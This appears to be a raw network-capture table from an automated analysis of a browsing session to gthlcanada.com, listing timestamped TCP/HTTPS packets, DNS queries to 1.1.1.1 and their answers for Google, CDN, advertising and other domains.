                                                                                                                          Jan 13, 2025 22:01:18.906483889 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.907666922 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.909651041 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.909727097 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.909934998 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.909955025 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.910101891 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.911107063 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.912951946 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.913000107 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.913094044 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.913111925 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.913364887 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.913882971 CET4434990254.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.913994074 CET4434990254.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.914052963 CET49902443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:18.914130926 CET49902443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:18.914144039 CET4434990254.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.914262056 CET49902443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:18.914319038 CET49902443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:18.914519072 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.916553020 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.916685104 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.916774035 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.916796923 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.917045116 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.917881966 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.918690920 CET4434990254.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.918797016 CET4434990254.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.918930054 CET49902443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:18.918994904 CET49902443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:18.919152021 CET49902443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:18.919177055 CET4434990254.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.919497013 CET49920443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:18.919526100 CET4434992054.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.919676065 CET49920443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:18.919811964 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.919946909 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.920051098 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.920052052 CET49920443192.168.11.2054.239.153.76
                                                                                                                          Jan 13, 2025 22:01:18.920069933 CET4434992054.239.153.76192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.920073986 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.920339108 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.921145916 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.922811031 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.922997952 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.923016071 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.924432039 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.924571991 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.924592018 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.926017046 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.926189899 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.926219940 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.927675009 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.927846909 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.927892923 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.927913904 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.928118944 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.929172039 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.930738926 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.930790901 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.930969000 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.930998087 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.931185961 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.931512117 CET49876443192.168.11.20176.53.147.97
                                                                                                                          Jan 13, 2025 22:01:18.932202101 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.933739901 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.933866978 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.933892012 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.935265064 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.935476065 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.935580969 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.935607910 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.935858965 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.936981916 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.938453913 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.938502073 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.938760042 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.938783884 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.938993931 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.939759016 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.941255093 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.941446066 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.941471100 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.942429066 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.942670107 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.942697048 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.942727089 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.942919016 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.943998098 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.945466042 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.945542097 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.945719957 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.945744038 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.946017027 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.946698904 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.948554993 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.948666096 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.948750019 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.948776007 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.949114084 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.949377060 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.951039076 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.951090097 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.951184034 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.951210022 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.951395035 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.952342033 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.953308105 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.953470945 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.953495026 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.954691887 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.954756975 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.954978943 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.955008984 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.955161095 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.956187963 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.957318068 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.957540035 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.957629919 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.957655907 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.958010912 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.958542109 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.960024118 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.960073948 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.960298061 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.960323095 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.960460901 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.960931063 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.962970972 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.963205099 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.963313103 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.963340044 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.963613987 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.963664055 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.964627981 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.964803934 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.964828014 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.965796947 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.965948105 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.965961933 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.967118979 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.967319012 CET49892443192.168.11.20172.253.63.154
                                                                                                                          Jan 13, 2025 22:01:18.967344046 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.968331099 CET44349892172.253.63.154192.168.11.20
                                                                                                                          Jan 13, 2025 22:01:18.968596935 CET44349892172.253.63.154192.168.11.20
                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                          Jan 13, 2025 22:01:11.225471973 CET192.168.11.201.1.1.10xd5adStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:11.225573063 CET192.168.11.201.1.1.10x686fStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:12.198606968 CET192.168.11.201.1.1.10xbeaeStandard query (0)gthlcanada.comA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:12.198751926 CET192.168.11.201.1.1.10x298cStandard query (0)gthlcanada.com65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.090404987 CET192.168.11.201.1.1.10xbf90Standard query (0)secure.widget.cloud.opta.netA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.090590954 CET192.168.11.201.1.1.10xb67dStandard query (0)secure.widget.cloud.opta.net65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.100171089 CET192.168.11.201.1.1.10x9ac6Standard query (0)content.jwplatform.comA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.100275040 CET192.168.11.201.1.1.10x7940Standard query (0)content.jwplatform.com65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.100508928 CET192.168.11.201.1.1.10x902dStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.100579023 CET192.168.11.201.1.1.10x4026Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.100821018 CET192.168.11.201.1.1.10x9e82Standard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.100924015 CET192.168.11.201.1.1.10xc2f9Standard query (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.186866999 CET192.168.11.201.1.1.10x89Standard query (0)d2pr6pnwfmh0za.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.186986923 CET192.168.11.201.1.1.10x6570Standard query (0)d2pr6pnwfmh0za.cloudfront.net65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.848383904 CET192.168.11.201.1.1.10xfe96Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.848490953 CET192.168.11.201.1.1.10x1a66Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.950169086 CET192.168.11.201.1.1.10x827bStandard query (0)d2pr6pnwfmh0za.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.950233936 CET192.168.11.201.1.1.10x4f75Standard query (0)d2pr6pnwfmh0za.cloudfront.net65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:14.179615974 CET192.168.11.201.1.1.10x922eStandard query (0)content.jwplatform.comA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:14.179732084 CET192.168.11.201.1.1.10x5a79Standard query (0)content.jwplatform.com65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:14.588277102 CET192.168.11.201.1.1.10xeba6Standard query (0)gthlcanada.comA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:14.588448048 CET192.168.11.201.1.1.10x440aStandard query (0)gthlcanada.com65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:14.727520943 CET192.168.11.201.1.1.10x1d7dStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:14.727663040 CET192.168.11.201.1.1.10x86ccStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:15.828093052 CET192.168.11.201.1.1.10x6042Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:15.828212976 CET192.168.11.201.1.1.10xa0a1Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:16.401698112 CET192.168.11.201.1.1.10xeaefStandard query (0)static.ctctcdn.comA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:16.401787996 CET192.168.11.201.1.1.10x9b18Standard query (0)static.ctctcdn.com65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:16.402215004 CET192.168.11.201.1.1.10x42dStandard query (0)rum-static.pingdom.netA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:16.402281046 CET192.168.11.201.1.1.10x57acStandard query (0)rum-static.pingdom.net65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:16.402424097 CET192.168.11.201.1.1.10xd9aStandard query (0)dff2h0hbfv6w4.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:16.402529001 CET192.168.11.201.1.1.10x8b8bStandard query (0)dff2h0hbfv6w4.cloudfront.net65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:16.507963896 CET192.168.11.201.1.1.10xa70Standard query (0)dff2h0hbfv6w4.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:16.612459898 CET192.168.11.201.1.1.10x9b46Standard query (0)www.googletagservices.comA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:16.612555027 CET192.168.11.201.1.1.10x3b7bStandard query (0)www.googletagservices.com65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:16.612706900 CET192.168.11.201.1.1.10x6251Standard query (0)loopconstruct.comA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:16.612796068 CET192.168.11.201.1.1.10x15ddStandard query (0)loopconstruct.com65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:17.380701065 CET192.168.11.201.1.1.10xa160Standard query (0)rum-static.pingdom.netA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:17.380825043 CET192.168.11.201.1.1.10x603eStandard query (0)rum-static.pingdom.net65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:17.431864977 CET192.168.11.201.1.1.10x5910Standard query (0)static.ctctcdn.comA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:17.431938887 CET192.168.11.201.1.1.10xf596Standard query (0)static.ctctcdn.com65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:17.436748028 CET192.168.11.201.1.1.10x3e3dStandard query (0)listgrowth.ctctcdn.comA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:17.436846018 CET192.168.11.201.1.1.10xd66Standard query (0)listgrowth.ctctcdn.com65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:17.704103947 CET192.168.11.201.1.1.10x5352Standard query (0)www.googletagservices.comA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:17.704201937 CET192.168.11.201.1.1.10x8d02Standard query (0)www.googletagservices.com65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:17.717298031 CET192.168.11.201.1.1.10x4e23Standard query (0)securepubads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:17.717398882 CET192.168.11.201.1.1.10xa139Standard query (0)securepubads.g.doubleclick.net65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:18.503231049 CET192.168.11.201.1.1.10xc2b6Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:18.503384113 CET192.168.11.201.1.1.10x4615Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:18.519438028 CET192.168.11.201.1.1.10x6fdaStandard query (0)listgrowth.ctctcdn.comA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:18.519710064 CET192.168.11.201.1.1.10xb080Standard query (0)listgrowth.ctctcdn.com65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:18.891830921 CET192.168.11.201.1.1.10x4493Standard query (0)virtual.urban-orthodontics.comA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:18.891931057 CET192.168.11.201.1.1.10xb8abStandard query (0)virtual.urban-orthodontics.com65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:18.892338991 CET192.168.11.201.1.1.10x6054Standard query (0)loopconstruct.comA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:18.892448902 CET192.168.11.201.1.1.10x29a6Standard query (0)loopconstruct.com65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:19.038125038 CET192.168.11.201.1.1.10x2355Standard query (0)securepubads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:19.038211107 CET192.168.11.201.1.1.10x37c9Standard query (0)securepubads.g.doubleclick.net65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:22.665828943 CET192.168.11.201.1.1.10xc9feStandard query (0)gthl.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:22.665993929 CET192.168.11.201.1.1.10x2665Standard query (0)gthl.s3.amazonaws.com65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:22.675513029 CET192.168.11.201.1.1.10x49bdStandard query (0)securepubads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:22.675632954 CET192.168.11.201.1.1.10x6f2bStandard query (0)securepubads.g.doubleclick.net65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:22.679121017 CET192.168.11.201.1.1.10x64d2Standard query (0)ep1.adtrafficquality.googleA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:22.679220915 CET192.168.11.201.1.1.10x8cffStandard query (0)ep1.adtrafficquality.google65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:22.735642910 CET192.168.11.201.1.1.10x8f86Standard query (0)rum-collector-2.pingdom.netA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:22.735707045 CET192.168.11.201.1.1.10xa4a9Standard query (0)rum-collector-2.pingdom.net65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:23.433027029 CET192.168.11.201.1.1.10xb703Standard query (0)gthl.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:23.433120966 CET192.168.11.201.1.1.10x2e72Standard query (0)gthl.s3.amazonaws.com65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:23.536349058 CET192.168.11.201.1.1.10x897cStandard query (0)ep2.adtrafficquality.googleA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:23.536454916 CET192.168.11.201.1.1.10xa4d6Standard query (0)ep2.adtrafficquality.google65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:23.536596060 CET192.168.11.201.1.1.10xf8afStandard query (0)ep1.adtrafficquality.googleA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:23.536672115 CET192.168.11.201.1.1.10xf5bdStandard query (0)ep1.adtrafficquality.google65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:23.985152960 CET192.168.11.201.1.1.10x7a40Standard query (0)rum-collector-2.pingdom.netA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:23.985268116 CET192.168.11.201.1.1.10x7742Standard query (0)rum-collector-2.pingdom.net65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:24.411494017 CET192.168.11.201.1.1.10xa76fStandard query (0)ep2.adtrafficquality.googleA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:24.411607981 CET192.168.11.201.1.1.10x58a4Standard query (0)ep2.adtrafficquality.google65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:24.411794901 CET192.168.11.201.1.1.10x8a46Standard query (0)ep2.adtrafficquality.googleA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:24.411843061 CET192.168.11.201.1.1.10xd2e4Standard query (0)ep2.adtrafficquality.google65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:26.822501898 CET192.168.11.201.1.1.10x13bcStandard query (0)www.googletagservices.comA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:26.822575092 CET192.168.11.201.1.1.10x3735Standard query (0)www.googletagservices.com65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:28.486684084 CET192.168.11.201.1.1.10xf223Standard query (0)publickeyservice.msmt.gcp.privacysandboxservices.comA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:28.486732960 CET192.168.11.201.1.1.10x5719Standard query (0)publickeyservice.msmt.gcp.privacysandboxservices.com65IN (0x0001)false
                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                          Jan 13, 2025 22:01:11.328166008 CET1.1.1.1192.168.11.200xd5adNo error (0)www.google.com172.253.122.104A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:11.328166008 CET1.1.1.1192.168.11.200xd5adNo error (0)www.google.com172.253.122.99A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:11.328166008 CET1.1.1.1192.168.11.200xd5adNo error (0)www.google.com172.253.122.103A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:11.328166008 CET1.1.1.1192.168.11.200xd5adNo error (0)www.google.com172.253.122.106A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:11.328166008 CET1.1.1.1192.168.11.200xd5adNo error (0)www.google.com172.253.122.105A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:11.328166008 CET1.1.1.1192.168.11.200xd5adNo error (0)www.google.com172.253.122.147A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:11.328193903 CET1.1.1.1192.168.11.200x686fNo error (0)www.google.com65IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:12.325453997 CET1.1.1.1192.168.11.200xbeaeNo error (0)gthlcanada.com137.117.65.222A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.191862106 CET1.1.1.1192.168.11.200xbf90No error (0)secure.widget.cloud.opta.netsecure.widget.cloud.opta.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.192445040 CET1.1.1.1192.168.11.200xb67dNo error (0)secure.widget.cloud.opta.netsecure.widget.cloud.opta.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.201028109 CET1.1.1.1192.168.11.200x902dNo error (0)www.google.com142.251.16.106A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.201028109 CET1.1.1.1192.168.11.200x902dNo error (0)www.google.com142.251.16.103A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.201028109 CET1.1.1.1192.168.11.200x902dNo error (0)www.google.com142.251.16.104A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.201028109 CET1.1.1.1192.168.11.200x902dNo error (0)www.google.com142.251.16.99A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.201028109 CET1.1.1.1192.168.11.200x902dNo error (0)www.google.com142.251.16.105A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.201028109 CET1.1.1.1192.168.11.200x902dNo error (0)www.google.com142.251.16.147A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 22:01:13.201241016 CET1.1.1.1192.168.11.200x4026No error (0)www.google.com65IN (0x0001)false
